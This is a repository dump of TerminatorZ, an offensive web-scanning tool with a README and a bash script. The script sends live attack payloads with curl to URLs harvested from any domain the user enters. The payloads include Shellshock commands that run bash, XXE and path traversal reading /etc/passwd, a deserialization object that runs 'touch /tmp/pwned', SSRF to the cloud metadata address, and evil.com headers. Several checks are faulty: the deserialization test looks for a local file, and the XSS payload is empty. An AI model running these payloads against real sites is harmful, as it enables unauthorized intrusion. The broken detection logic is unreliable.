.
675 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # BHEH's TerminatorZ
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 | TerminatorZ is written by Chris "SaintDruG" Abou-Chabke from Black Hat Ethical Hacking and is designed for Offensive Security attacks.
10 |
11 |
12 | Black Hat Ethical Hacking
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
34 |
35 |
36 | # Description
37 |
38 | TerminatorZ is a highly sophisticated and efficient web security tool that scans for potential vulnerabilities in your web applications. It uses a combination of advanced techniques, including using popular tools like waybackurls and curl, to scan your web applications and highlight any potential vulnerabilities but in a passive and quick way for a quick look. The results are displayed in an easy-to-read format in the terminal, and only vulnerable results are saved for further investigation. With its lightweight and fast nature, TerminatorZ is the perfect tool for any RED Teamer.
39 |
40 |
41 | # What Makes TerminatorZ Unique:
42 |
43 | TerminatorZ is special because it's a highly customized for quick and speed high priority known CVES. The script then reads each URL from urls.txt and checks for various vulnerabilities including RCE, CSRF, LFI, open redirect, Log4J, RFI, path traversal, and SQL injection. For each vulnerability, the script performs a test by sending a specific HTTP request and looking for a specific response.
44 |
45 | If the vulnerability is detected, the script will write a message to the domain.txt file indicating that the URL is vulnerable. If the vulnerability is not detected, the script will write a message indicating that the URL is not vulnerable.
46 |
47 | **Total POCs it will check so far after v2: 24**
48 |
49 | It is also Special well, because:
50 |
51 | 
52 |
53 |
54 | # The Flow & Methodology
55 |
56 | The tool starts by asking the user to input the domain they wish to scan. It then creates a folder to store the results and starts the scan. The scan utilizes curl to make HTTP requests to the target domain and checks for various vulnerabilities by injecting known payloads. The tool then checks the responses for indicators of exploitation and validates the results to determine if the target is vulnerable.
57 |
58 | The tool's methodology is carefully designed to ensure that each type of vulnerability is checked specifically and thoroughly. The tool employs a highly analytical and methodical approach to the scanning process, which results in the identification of even the most elusive vulnerabilities. The tool's logic is designed to be highly efficient and effective, making it the ultimate choice for red team security experts and web security professionals.
59 |
60 | In conclusion, TerminatorZ offers a combination of technology, methodology, and expert logic makes it the ultimate tool for identifying and mitigating web application vulnerabilities. Speed is sometimes needed, if you want more tools that do not focus on speed, please make sure to check our other ones :)
61 |
62 | # Features:
63 |
64 | Scans for various web application vulnerabilities, including:
65 |
66 | - File Upload
67 |
68 | - Command Injection
69 |
70 | - Host Header Injection
71 |
72 | - HTTP Parameter Pollution (HPP)
73 |
74 | - Clickjacking
75 |
76 | - CORS Misconfiguration
77 |
78 | - Sensitive Data Exposure
79 |
80 | - Session Fixation
81 |
82 | - XSS (Cross-site scripting)
83 |
84 | - SSRF (Server-side request forgery)
85 |
86 | - XXE (XML external entity)
87 |
88 | - Insecure deserialization
89 |
90 | - Remote Code Execution via Shellshock (RCE)
91 |
92 | - SQL Injection (SQLi)
93 |
94 | - Cross-Site Scripting (XSS)
95 |
96 | - Cross-Site Request Forgery (CSRF)
97 |
98 | - Remote Code Execution (RCE)
99 |
100 | - Log4J
101 |
102 | - Directory Traversal (DT)
103 |
104 | - File Inclusion (FI)
105 |
106 | - Sensitive Data Exposure (SDE)
107 |
108 | - Server Side Request Forgery (SSRF)
109 |
110 | - Shell Injection (SI)
111 |
112 | - Broken Access Control (BAC)
113 |
114 | - Generates Random Sun Tzu Quote for Red Teamers, Checks if you are connected to the Internet too!
115 |
116 | - Utilizes tools such as waybackurls, curl, and others for comprehensive vulnerability assessments
117 |
118 | - Lightweight and fast, delivering results in real-time directly to the terminal
119 |
120 | - Only reports vulnerabilities, making it easy to prioritize and remediate vulnerabilities in a timely manner
121 |
122 | # Screenshot
123 |
124 | 
125 | 
126 | 
127 |
128 |
129 | # Expansion
130 |
131 | Feel free to expand more Pocs, and integrate it, the idea is speed, and sending 1 curl, send a push!
132 |
133 | # Requirements:
134 |
135 | - waybackurls: This tool can be installed by running `go install github.com/tomnomnom/waybackurls@latest`
136 |
137 | - cURL: This tool is commonly pre-installed on Kali Linux and Ubuntu, but can be installed by running `apt-get install curl` on Ubuntu or `brew install curl` on MacOS
138 |
139 | - httpx: is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryable http library. To install it: `go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest`
140 |
141 | - lolcat: `pip install lolcat` for rainbow beauty
142 | - You also need, toilet, fortune-mod but the new update will install them in the beginning.
143 |
144 | # Installation
145 |
146 | `git clone https://github.com/blackhatethicalhacking/TerminatorZ.git`
147 |
148 | `cd TerminatorZ`
149 |
150 | `chmod +x TerminatorZ.sh`
151 |
152 | `./TerminatorZ.sh`
153 |
154 | # Compatibility:
155 |
156 | This tool has been tested on Kali Linux, Ubuntu and MacOS.
157 |
158 | # Latest Version & Updates:
159 |
160 | ## Version 2.0:
161 |
162 | - Added 8 new Vulnerabilities with exploits:
163 |
164 | • File Upload
165 |
166 | • Command Injection
167 |
168 | • Host Header Injection
169 |
170 | • HTTP Parameter Pollution (HPP)
171 |
172 | • Clickjacking
173 |
174 | • CORS Misconfiguration
175 |
176 | • Sensitive Data Exposure
177 |
178 | • Session Fixation
179 |
180 | ## Version 1.1:
181 |
182 | - Enhancement in the output, Red for not vulnerable, Green for vulnerable.
183 | - Counts URLs before starting the attack, which gives you an estimate, based on final URLs.
184 | - Added 5 more new Vulnerabilities with exploits:
185 |
186 | • XSS (Cross-site scripting)
187 |
188 | • SSRF (Server-side request forgery)
189 |
190 | • XXE (XML external entity)
191 |
192 | • Insecure deserialization
193 |
194 | • Remote Code Execution via Shellshock (RCE)
195 |
196 | # To Do
197 |
198 | A lot will be done and added to it, this is the starting point. If you want to contribute, send me a commit explaining what more / better you are doing, and will credit you if it fits the model of design in mind!
199 |
200 | # Disclaimer
201 |
202 | This tool is provided for educational and research purpose only. The author of this project are no way responsible for any misuse of this tool.
203 | We use it to test under NDA agreements with clients and their consents for pentesting purposes and we never encourage to misuse or take responsibility for any damage caused !
204 |
205 |
208 |
209 |
210 | Introducing our Merch Store, designed for the Offensive Security community. Explore a curated collection of apparel and drinkware, perfect for both professionals and enthusiasts. Our selection includes premium t-shirts, hoodies, and mugs, each featuring bold hacking-themed slogans and graphics that embody the spirit of red teaming and offensive security.
211 | Hack with style and showcase your dedication to hacker culture with gear that’s as dynamic and resilient as you are. 😊
212 |
213 |
214 |
215 |
216 |
217 |
218 |
--------------------------------------------------------------------------------
/TerminatorZ.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Original script setup
4 | curl --silent "https://raw.githubusercontent.com/blackhatethicalhacking/Subdomain_Bruteforce_bheh/main/ascii.sh" | lolcat
5 | echo ""
6 | # Generate a random Sun Tzu quote for offensive security
7 | quotes=("The supreme art of war is to subdue the enemy without fighting." "All warfare is based on deception." "He who knows when he can fight and when he cannot, will be victorious." "The whole secret lies in confusing the enemy, so that he cannot fathom our real intent." "To win one hundred victories in one hundred battles is not the acme of skill. To subdue the enemy without fighting is the acme of skill.")
8 | random_quote=${quotes[$RANDOM % ${#quotes[@]}]}
9 | echo "Offensive Security Tip: $random_quote - Sun Tzu" | lolcat
10 | sleep 1
11 | echo "MEANS, IT'S ☕ 1337 ⚡ TIME, 369 ☯ " | lolcat
12 | sleep 1
13 | figlet -w 80 -f small TerminatorZ | lolcat
14 | echo ""
15 | echo "[YOUR ARE USING TerminatorZ] - (v2.0) CODED BY Chris 'SaintDruG' Abou-Chabké WITH ❤ FOR blackhatethicalhacking.com for Educational Purposes only!" | lolcat
16 | sleep 1
17 | echo "This Version 2 now checks for a total of 21 exploits" | lolcat
18 |
19 | # Check if the user is connected to the internet
20 | tput bold;echo "CHECKING IF YOU ARE CONNECTED TO THE INTERNET!" | lolcat
21 | wget -q --spider https://google.com
22 | if [ $? -ne 0 ]; then
23 | echo "++++ CONNECT TO THE INTERNET BEFORE RUNNING TerminatorZ !" | lolcat
24 | exit 1
25 | fi
26 | tput bold;echo "++++ CONNECTION FOUND, LET'S GO!" | lolcat
27 |
28 | # Install Dependencies for Kali
29 | echo "Installing Dependencies for Kali Linux Only, you must install manually for other OS..." | lolcat
30 |
31 | # Title and installation for fortune-mod
32 | echo "Installing fortune-mod..." | lolcat
33 | apt-get install -y fortune-mod > /dev/null 2>&1
34 |
35 | # Title and installation for lolcat
36 | echo "Installing lolcat..." | lolcat
37 | pip install lolcat > /dev/null 2>&1
38 |
39 | # Title and installation for curl
40 | echo "Installing curl..." | lolcat
41 | apt-get install -y curl > /dev/null 2>&1
42 |
43 | # Title and installation for figlet
44 | echo "Installing figlet..." | lolcat
45 | apt-get install -y figlet > /dev/null 2>&1
46 |
47 | # Title and installation for toilet
48 | echo "Installing toilet..." | lolcat
49 | apt-get install -y toilet > /dev/null 2>&1
50 |
51 | echo "Finished Installing: Fortune-mod, lolcat, curl, figlet and toilet. Make sure to install manually if necessary!" | lolcat
52 |
53 | figlet -w 80 -f small TerminatorZ | lolcat
54 | echo ""
55 | # Input the domain
56 | echo "Enter the domain: (example.com) "
57 | read domain
58 |
59 | if [ -d "$domain" ]; then
60 | echo "Error: Directory $domain already exists"
61 | exit 1
62 | else
63 | mkdir "$domain"
64 | fi
65 |
66 | waybackurls $domain | grep -E "\.js$|\.php$|\.yml$|\.env$|\.txt$|\.xml$|\.config$" | httpx -stats | sort -u | tee urls.txt | lolcat
67 |
68 | count=$(wc -l < urls.txt)
69 | echo "Total URLs found: $count" | lolcat
70 |
71 | # Matrix effect
72 | echo "Let us Terminate them in 5 seconds - Matrix Mode ON:" | toilet --metal -f term -F border
73 |
74 | R='\033[0;31m'
75 | G='\033[0;32m'
76 | Y='\033[1;33m'
77 | B='\033[0;34m'
78 | P='\033[0;35m'
79 | C='\033[0;36m'
80 | W='\033[1;37m'
81 |
82 | for ((i=0; i<5; i++)); do
83 | echo -ne "${R}10 ${G}01 ${Y}11 ${B}00 ${P}01 ${C}10 ${W}00 ${G}11 ${P}01 ${B}10 ${Y}11 ${C}00\r"
84 | sleep 0.2
85 | echo -ne "${R}01 ${G}10 ${Y}00 ${B}11 ${P}10 ${C}01 ${W}11 ${G}00 ${P}10 ${B}01 ${Y}00 ${C}11\r"
86 | sleep 0.2
87 | echo -ne "${R}11 ${G}00 ${Y}10 ${B}01 ${P}00 ${C}11 ${W}01 ${G}10 ${P}00 ${B}11 ${Y}10 ${C}01\r"
88 | sleep 0.2
89 | echo -ne "${R}00 ${G}11 ${Y}01 ${B}10 ${P}11 ${C}00 ${W}10 ${G}01 ${P}11 ${B}00 ${Y}01 ${C}10\r"
90 | sleep 0.2
91 | done
92 |
93 | # Start the attacks
94 | while read url
95 | do
96 |
97 | # Check for XSS (Cross-site scripting) vulnerability
98 | echo -e "\e[33mTesting \e[0m${url}\e[33m for XSS vulnerability...\e[0m"
99 | response=$(curl -s -H 'User-Agent: Mozilla/5.0' -d "" "$url")
100 | if [[ $response == *""* ]]; then
101 | echo -e "$url is XSS \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
102 | else
103 | echo -e "$url is not XSS \e[31mvulnerable\e[0m"
104 | fi
105 |
106 | # Check for SSRF (Server-side request forgery) vulnerability
107 | echo -e "\e[33mTesting \e[0m${url}\e[33m for SSRF vulnerability...\e[0m"
108 | response=$(curl -s -H 'User-Agent: Mozilla/5.0' "$url?url=http://169.254.169.254/")
109 | if [[ $response == *"169.254.169.254"* ]]; then
110 | echo -e "$url is SSRF \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
111 | else
112 | echo -e "$url is not SSRF \e[31mvulnerable\e[0m"
113 | fi
114 |
115 | # Check for XXE (XML external entity) vulnerability
116 | echo -e "\e[33mTesting \e[0m${url}\e[33m for XXE vulnerability...\e[0m"
117 | response=$(curl -s -H 'User-Agent: Mozilla/5.0' -d ']>&xxe;' "$url")
118 | if [[ $response == *"root:x"* ]]; then
119 | echo -e "$url is XXE \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
120 | else
121 | echo -e "$url is not XXE \e[31mvulnerable\e[0m"
122 | fi
123 |
124 | # Check for Insecure Deserialization vulnerability:
125 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Insecure Deserialization vulnerability...\e[0m"
126 | response=$(curl -s -H 'User-Agent: Mozilla/5.0' -d 'O:8:"stdClass":1:{s:5:"shell";s:5:"touch /tmp/pwned";}' "$url")
127 | if [[ -f "/tmp/pwned" ]]; then
128 | echo -e "$url is insecure deserialization \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
129 | else
130 | echo -e "$url is not insecure deserialization \e[31mvulnerable\e[0m"
131 | fi
132 |
133 | # Check for Remote Code Execution via Shellshock vulnerability:
134 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Shellshock vulnerability...\e[0m"
135 | response=$(curl -s -H "User-Agent: () { :; }; /bin/bash -c 'echo vulnerable'" "$url")
136 | if [[ $response == *"vulnerable"* ]]; then
137 | echo -e "$url is \e[32mvulnerable\e[0m to Shellshock RCE" >> "$domain/$domain.txt"
138 | # Execute arbitrary command as proof of concept
139 | echo "Executing arbitrary command as proof of concept..."
140 | response=$(curl -s -H "User-Agent: () { :; }; /bin/bash -c 'echo SHELLSHOCK_RCE_DEMO'" "$url")
141 | if [[ $response == *"SHELLSHOCK_RCE_DEMO"* ]]; then
142 | echo "Successful RCE via Shellshock vulnerability"
143 | else
144 | echo "Failed to execute arbitrary command"
145 | fi
146 | else
147 | echo -e "$url is not \e[31mvulnerable\e[0m to Shellshock RCE"
148 | fi
149 |
150 | # Check for RCE vulnerability
151 | echo -e "\e[33mTesting \e[0m${url}\e[33m for RCE vulnerability...\e[0m"
152 | response=$(curl -s -H 'User-Agent: () { :;}; echo vulnerable' "$url")
153 | if [[ $response == *"vulnerable"* ]]; then
154 | echo -e "$url is RCE \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
155 | else
156 | echo -e "$url is not RCE \e[31mvulnerable\e[0m"
157 | fi
158 |
159 | # Check for CSRF vulnerability
160 | echo -e "\e[33mTesting \e[0m${url}\e[33m for CSRF vulnerability...\e[0m"
161 | response=$(curl -s -X POST -d 'token=test' "$url")
162 | if [[ $response == *"token=test"* ]]; then
163 | echo -e "$url is CSRF \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
164 | else
165 | echo -e "$url is not CSRF \e[31mvulnerable\e[0m"
166 | fi
167 |
168 | # Check for LFI vulnerability
169 | echo -e "\e[33mTesting \e[0m${url}\e[33m for LFI vulnerability...\e[0m"
170 | response=$(curl -s "$url/../../../../../../../../../../../../etc/passwd")
171 | if [[ $response == *"root:"* ]]; then
172 | echo -e "$url is LFI \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
173 | else
174 | echo -e "$url is not LFI \e[31mvulnerable\e[0m"
175 | fi
176 |
177 | # Check for open redirect vulnerability
178 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Open Redirect vulnerability...\e[0m"
179 | response=$(curl -s -L "$url?redirect=http://google.com")
180 | if [[ $response == *"Google"* ]]; then
181 | echo -e "$url is open redirect \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
182 | else
183 | echo -e "$url is not open redirect \e[31mvulnerable\e[0m"
184 | fi
185 |
186 | # Check for Log4J vulnerability
187 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Log4J vulnerability...\e[0m"
188 | response=$(curl -s "$url/%20%20%20%20%20%20%20%20@org.apache.log4j.BasicConfigurator@configure()")
189 | if [[ $response == *"log4j"* ]]; then
190 | echo -e "$url is Log4J \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
191 | else
192 | echo -e "$url is not Log4J \e[31mvulnerable\e[0m"
193 | fi
194 |
195 | # Check for RFI vulnerability
196 | echo -e "\e[33mTesting \e[0m${url}\e[33m for RFI vulnerability...\e[0m"
197 | response=$(curl -s "$url?file=http://google.com")
198 | if [[ $response == *"Google"* ]]; then
199 | echo -e "$url is RFI \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
200 | else
201 | echo -e "$url is not RFI \e[31mvulnerable\e[0m"
202 | fi
203 |
204 | # Check for directory traversal vulnerability
205 | echo -e "\e[33mTesting \e[0m${url}\e[33m for path/directory traversal vulnerability...\e[0m"
206 | response=$(curl -s "$url/../../../../../../../../../../../../etc/passwd")
207 | if [[ $response == *"root:"* ]]; then
208 | echo -e "$url is path traversal \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
209 | else
210 | echo -e "$url is not path traversal \e[31mvulnerable\e[0m"
211 | fi
212 |
213 | # Check for SQL injection vulnerability
214 | echo -e "\e[33mTesting \e[0m${url}\e[33m for SQL injection vulnerability...\e[0m"
215 | response=$(curl -s "$url/index.php?id=1'")
216 | if [[ $response == *"SQL syntax"* ]]; then
217 | echo -e "$url is SQL injection \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
218 | else
219 | echo -e "$url is not SQL injection \e[31mvulnerable\e[0m"
220 | fi
221 |
222 | # Check for File Upload vulnerability
223 | echo -e "\e[33mTesting \e[0m${url}\e[33m for File Upload vulnerability...\e[0m"
224 | response=$(curl -s -F "file=@/etc/passwd" "$url/upload")
225 | if [[ $response == *"root:x"* ]]; then
226 | echo -e "$url is File Upload \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
227 | else
228 | echo -e "$url is not File Upload \e[31mvulnerable\e[0m"
229 | fi
230 |
231 | # Check for Command Injection vulnerability
232 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Command Injection vulnerability...\e[0m"
233 | response=$(curl -s -d "cmd=whoami" "$url/cmd")
234 | if [[ $response == *"root"* ]]; then
235 | echo -e "$url is Command Injection \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
236 | else
237 | echo -e "$url is not Command Injection \e[31mvulnerable\e[0m"
238 | fi
239 |
240 | # Check for Host Header Injection vulnerability
241 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Host Header Injection vulnerability...\e[0m"
242 | response=$(curl -s -H 'Host: evil.com' "$url")
243 | if [[ $response == *"evil.com"* ]]; then
244 | echo -e "$url is Host Header Injection \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
245 | else
246 | echo -e "$url is not Host Header Injection \e[31mvulnerable\e[0m"
247 | fi
248 |
249 | # Check for HTTP Parameter Pollution (HPP) vulnerability
250 | echo -e "\e[33mTesting \e[0m${url}\e[33m for HTTP Parameter Pollution vulnerability...\e[0m"
251 | response=$(curl -s "$url?page=1&page=2")
252 | if [[ $response == *"page=2"* ]]; then
253 | echo -e "$url is HTTP Parameter Pollution \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
254 | else
255 | echo -e "$url is not HTTP Parameter Pollution \e[31mvulnerable\e[0m"
256 | fi
257 |
258 | # Check for Clickjacking vulnerability
259 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Clickjacking vulnerability...\e[0m"
260 | response=$(curl -s -I "$url")
261 | if [[ $response != *"X-Frame-Options: DENY"* && $response != *"X-Frame-Options: SAMEORIGIN"* ]]; then
262 | echo -e "$url is Clickjacking \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
263 | else
264 | echo -e "$url is not Clickjacking \e[31mvulnerable\e[0m"
265 | fi
266 |
267 | # Check for CORS Misconfiguration vulnerability
268 | echo -e "\e[33mTesting \e[0m${url}\e[33m for CORS Misconfiguration vulnerability...\e[0m"
269 | response=$(curl -s -H "Origin: http://evil.com" -I "$url")
270 | if [[ $response == *"Access-Control-Allow-Origin: http://evil.com"* ]]; then
271 | echo -e "$url is CORS Misconfiguration \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
272 | else
273 | echo -e "$url is not CORS Misconfiguration \e[31mvulnerable\e[0m"
274 | fi
275 |
276 | # Check for Sensitive Data Exposure vulnerability
277 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Sensitive Data Exposure vulnerability...\e[0m"
278 | response=$(curl -s "$url")
279 | if [[ $response == *"API_KEY"* || $response == *"password"* || $response == *"api"* || $response == *"uri"* || $response == *"login"* ]]; then
280 | echo -e "$url is Sensitive Data Exposure \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
281 | else
282 | echo -e "$url is not Sensitive Data Exposure \e[31mvulnerable\e[0m"
283 | fi
284 |
285 | # Check for Session Fixation vulnerability
286 | echo -e "\e[33mTesting \e[0m${url}\e[33m for Session Fixation vulnerability...\e[0m"
287 | response=$(curl -s -I "$url")
288 | if [[ $response == *"Set-Cookie: sessionid=12345"* ]]; then
289 | echo -e "$url is Session Fixation \e[32mvulnerable\e[0m" >> "$domain/$domain.txt"
290 | else
291 | echo -e "$url is not Session Fixation \e[31mvulnerable\e[0m"
292 | fi
293 |
294 | done < urls.txt
295 |
296 | mv urls.txt $domain
297 | rm -rf lolcat
298 | echo "Targets have been T3rm1nat3d... I'll be back!" | lolcat
299 |
--------------------------------------------------------------------------------
/TerminatorZ_ascii.sh:
--------------------------------------------------------------------------------
1 | [38;5;184m [38;5;184m_[38;5;184m_[38;5;184m_[38;5;184m_[38;5;184m_[38;5;184m [38;5;184m [38;5;178m [38;5;214m [38;5;214m [38;5;214m [38;5;214m [38;5;214m [38;5;214m [38;5;214m [38;5;214m [38;5;214m [38;5;208m [38;5;208m [38;5;208m [38;5;208m [38;5;208m [38;5;208m [38;5;208m [38;5;208m_[38;5;208m [38;5;209m [38;5;203m [38;5;203m [38;5;203m [38;5;203m [38;5;203m [38;5;203m [38;5;203m [38;5;203m [38;5;203m [38;5;203m [38;5;203m [38;5;204m_[38;5;198m [38;5;198m [38;5;198m [38;5;198m [38;5;198m [38;5;198m [38;5;198m [38;5;198m [38;5;198m [38;5;199m [38;5;199m [38;5;199m [38;5;199m_[38;5;199m_[38;5;199m_[38;5;199m_[38;5;199m_
2 | [38;5;184m|[38;5;184m_[38;5;184m [38;5;184m [38;5;184m [38;5;178m_[38;5;214m|[38;5;214m_[38;5;214m_[38;5;214m [38;5;214m_[38;5;214m [38;5;214m_[38;5;214m_[38;5;214m [38;5;208m_[38;5;208m [38;5;208m_[38;5;208m_[38;5;208m [38;5;208m_[38;5;208m_[38;5;208m_[38;5;208m [38;5;209m([38;5;203m_[38;5;203m)[38;5;203m_[38;5;203m [38;5;203m_[38;5;203m_[38;5;203m [38;5;203m [38;5;203m [38;5;203m_[38;5;203m_[38;5;204m [38;5;198m_[38;5;198m|[38;5;198m [38;5;198m|[38;5;198m_[38;5;198m [38;5;198m_[38;5;198m_[38;5;198m_[38;5;199m [38;5;199m [38;5;199m_[38;5;199m [38;5;199m_[38;5;199m|[38;5;199m_[38;5;199m_[38;5;199m [38;5;199m [38;5;163m/
3 | [38;5;184m [38;5;184m [38;5;178m|[38;5;214m [38;5;214m|[38;5;214m/[38;5;214m [38;5;214m_[38;5;214m [38;5;214m\[38;5;214m [38;5;214m'[38;5;208m_[38;5;208m_[38;5;208m|[38;5;208m [38;5;208m'[38;5;208m_[38;5;208m [38;5;208m`[38;5;208m [38;5;209m_[38;5;203m [38;5;203m\[38;5;203m|[38;5;203m [38;5;203m|[38;5;203m [38;5;203m'[38;5;203m_[38;5;203m [38;5;203m\[38;5;203m [38;5;204m/[38;5;198m [38;5;198m_[38;5;198m`[38;5;198m [38;5;198m|[38;5;198m [38;5;198m_[38;5;198m_[38;5;198m/[38;5;199m [38;5;199m_[38;5;199m [38;5;199m\[38;5;199m|[38;5;199m [38;5;199m'[38;5;199m_[38;5;199m_[38;5;199m|[38;5;163m/[38;5;164m [38;5;164m/
4 | [38;5;214m [38;5;214m [38;5;214m|[38;5;214m [38;5;214m|[38;5;214m [38;5;214m [38;5;214m_[38;5;214m_[38;5;208m/[38;5;208m [38;5;208m|[38;5;208m [38;5;208m [38;5;208m|[38;5;208m [38;5;208m|[38;5;208m [38;5;209m|[38;5;203m [38;5;203m|[38;5;203m [38;5;203m|[38;5;203m [38;5;203m|[38;5;203m [38;5;203m|[38;5;203m [38;5;203m|[38;5;203m [38;5;204m|[38;5;198m [38;5;198m|[38;5;198m [38;5;198m([38;5;198m_[38;5;198m|[38;5;198m [38;5;198m|[38;5;198m [38;5;199m|[38;5;199m|[38;5;199m [38;5;199m([38;5;199m_[38;5;199m)[38;5;199m [38;5;199m|[38;5;199m [38;5;199m|[38;5;163m [38;5;164m [38;5;164m/[38;5;164m [38;5;164m/[38;5;164m_
5 | [38;5;214m [38;5;214m [38;5;214m|[38;5;214m_[38;5;214m|[38;5;214m\[38;5;208m_[38;5;208m_[38;5;208m_[38;5;208m|[38;5;208m_[38;5;208m|[38;5;208m [38;5;208m [38;5;208m|[38;5;209m_[38;5;203m|[38;5;203m [38;5;203m|[38;5;203m_[38;5;203m|[38;5;203m [38;5;203m|[38;5;203m_[38;5;203m|[38;5;203m_[38;5;203m|[38;5;204m_[38;5;198m|[38;5;198m [38;5;198m|[38;5;198m_[38;5;198m|[38;5;198m\[38;5;198m_[38;5;198m_[38;5;198m,[38;5;199m_[38;5;199m|[38;5;199m\[38;5;199m_[38;5;199m_[38;5;199m\[38;5;199m_[38;5;199m_[38;5;199m_[38;5;199m/[38;5;163m|[38;5;164m_[38;5;164m|[38;5;164m [38;5;164m/[38;5;164m_[38;5;164m_[38;5;164m_[38;5;164m_[38;5;164m|
6 |
7 | [0m
--------------------------------------------------------------------------------